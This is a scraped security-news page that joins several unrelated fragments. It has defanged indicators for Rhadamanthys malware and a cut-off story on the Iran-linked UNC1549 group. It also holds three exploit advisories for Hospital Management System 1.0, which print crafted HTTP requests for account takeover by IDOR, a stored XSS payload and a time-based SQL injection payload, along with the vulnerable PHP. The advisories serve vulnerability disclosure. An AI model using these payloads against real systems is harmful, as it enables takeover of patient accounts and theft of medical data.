185\[.\]172\[.\]128\[.\]169

Rhadamanthys download URL

yogapets\[.\]xyz/@abcmse1.exe
birdarid\[.\]org/@abcnp.exe

Rhadamanthys

e179a9e5d75d56140d11cbd29d92d8137b0a73f964dd3cfd46564ada572a3109
679fad2fd86d2fd9e1ec38fa15280c1186f35343583c7e83ab382b8c255f9e18

Rhadamanthys C2

185\[.\]172\[.\]128\[.\]170

 One year later, Rhadamanthys is still dropped via malvertising 

An Iran-nexus threat actor known as UNC1549 has been attributed with medium confidence to a new set of attacks targeting aerospace, aviation, and defense industries in the Middle East, including Israel and the U.A.E.
Other targets of the cyber espionage activity likely include Turkey, India, and Albania, Google-owned Mandiant said in a new analysis.
UNC1549 is said to overlap with

Iran-Linked UNC1549 Hackers Target Middle East Aerospace & Defense Sectors

Hospital Management System version 1.0 suffers from insecure direct object reference and account takeover vulnerabilities.

# Exploit Title: Hospital Management System - IDOR + Accaunt Takeover  
# Google Dork: N/A  
# Application: Hospital Management System  
# Date: 27.02.2024  
# Bugs: IDOR + Accaunt Takeover  
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

This report focuses on two vulnerabilities known as "Insecure Direct Object References (IDOR)" and "Account Takeover". These vulnerabilities occur in a scenario where user input and access privileges validation is inadequate.

## Proof of Concept (PoC):

Target User Information:

User 1:  
ID: 1  
Email: patient@patient.com  
Password: patient  
-----------------------------------  
User 2:  
ID: 4  
Email: attack@ker  
Password: q1w2e3  
-----------------------------------

User 1 Request

POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1  
Host: localhost  
Cookie: _ga=GA1.1.2080672900.1708952048; _gid=GA1.1.1833914840.1708952048; PHPSESSID=f6je8gcsm0h685mfr2g37ot8to  
...  
id00=1&oldemail=patient%40patient.com&email=patient%40patient.com&name=Mrs.Sunita+Dighe&nic=422201&Tele=9090909091&address=India&password=patient&cpassword=patient

User 2 Request

POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1  
Host: localhost  
Cookie: PHPSESSID=4c8per12a8freilu1upich92a4  
...  
id00=4&oldemail=attack%40ker&email=attack%40ker&name=attack+attacker&nic=123123123&Tele=0712345677&address=attac&password=q1w2e3&cpassword=q1w2e3

Attacker's Request

The attacker aims to modify the account details of "patient 1" and sends the following HTTP request:

POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1  
Host: localhost  
Cookie: PHPSESSID=4c8per12a8freilu1upich92a4  
...  
id00=1&oldemail=patient%40patient.com&email=patient%40patient.com&name=MRRS.Sunita+Dighe&nic=422201&Tele=9090909091&address=attac&password=q1w2e3&cpassword=q1w2e3

In the above SQL queries, the $id value received from the user is directly included in the query and security   
checks are not performed. This allows exploiting another user's information. At the same time, since   
the user's identity is obtained from the POST data, the attacker can pass his identity as another user's identity.

PoC video: https://www.youtube.com/watch?v=pmoBSnu9IYI

## Vulnerable code section:  
====================================================

$sql1="update patient set pemail='$email',pname='$name',ppassword='$password',pnic='$nic',ptel='$tele',paddress='$address' where pid=$id ;";  
$database->query($sql1);  
echo $sql1;  
$sql1="update webuser set email='$email' where email='$oldemail' ;";  
$database->query($sql1);  
echo $sql1;  
====================================================

## Risks This security vulnerability exposes user information to unauthorized access and modifications. Consequently, there are potential risks such as account takeover, privacy breaches, and non-compliance with security policies, which can lead to substantial damage and security breaches in the system.

Hospital Management System 1.0 Insecure Direct Object Reference / Account Takeover

Hospital Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Hospital Management System - Stord XSS# Google Dork: N/A# Application: Hospital Management System# Date: 27.02.2024# Bugs: Stord XSS# Exploit Author: SoSPiro# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html# Version: 1.0# Tested on: Windows 10 64 bit Wampserver # CVE : N/A## Vulnerability Description:A security vulnerability has been identified in the "Vaidya Mitra" healthcare application, specifically in the doctor's account settings functionality. The issue arises due to inadequate input validation, allowing an attacker to inject malicious scripts into the system, leading to a Cross-Site Scripting (XSS) vulnerability.## Proof of Concept (PoC):1. Exploiting Doctor's Account Settings:The attacker, using the Burp Suite Proxy tool, intercepts and modifies a POST request sent by the doctor to update their account settings.The payload <script>alert(1)</script> is injected into the email parameter.The manipulated request looks like the following:POST /Vaidya%20Mitra/vm/doctor/edit-doc.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0...Content-Type: application/x-www-form-urlencodedContent-Length: 170...id00=2&oldemail=doctor%40doctor.com&email=doctor%40doctor.com<script>alert(1)</script>&name=Dr.Akash+Sanap&nic=234&Tele=8080808080&spec=1&password=doctor&cpassword=doctorUpon submission, the payload gets stored in the doctor's email field.2. Triggering XSS in Admin's View:An admin viewing doctors' information at http://localhost/Vaidya%20Mitra/vm/admin/doctors.php inadvertently triggers the XSS vulnerability.The admin sends a GET request to view a doctor's details:GET /Vaidya%20Mitra/vm/admin/doctors.php?action=view&id=2 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0...The server returns the doctor's information, and the XSS payload in the email field is executed in the admin's browser, leading to the alert being triggered.PoC - video: https://drive.google.com/file/d/1dCz5Q3mKMfpB2pjPeOV6ZoBi1Nj74DR1/view?usp=drive_link

Hospital Management System 1.0 Cross Site Scripting

Hospital Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Hospital Management System - SQL Injection# Google Dork: N/A# Application: Hospital Management System# Date: 26.02.2024# Bugs: SQL Injection # Exploit Author: SoSPiro# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html# Version: 1.0# Tested on: Windows 10 64 bit Wampserver # CVE : N/A## Vulnerability Description:A security vulnerability has been identified in this web application due to the direct inclusion of user-input data into SQL queries, rendering it susceptible to SQL Injection attacks. This vulnerability may enable malicious actors to gain unauthorized access to sensitive information.## Proof of Concept (PoC):Below is an example of an attack that a malicious actor could execute to exploit this vulnerability.POST /Vaidya%20Mitra/vm/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 80Origin: http://localhostConnection: closeReferer: http://localhost/Vaidya%20Mitra/vm/login.phpCookie: _ga=GA1.1.2080672900.1708952048; _gid=GA1.1.1833914840.1708952048; PHPSESSID=18a16tga7k2glh7useremail=test@123.asd'%2b(select*from(select(sleep(5)))a)%2b'&userpassword=testIn this example, the payload appended to the useremail parameter aims to execute a sleep function, intentionally delaying the server's response time. Real-world attacks could involve more malicious operations.Request - Response foto: https://i.imgur.com/LxENLBz.png## Vulnerable code section:====================================================/Vaidya%20Mitra/vm/login.php$email = $_POST['useremail'];$password = $_POST['userpassword'];$result = $database->query("select * from webuser where email='$email'");

Tag

#google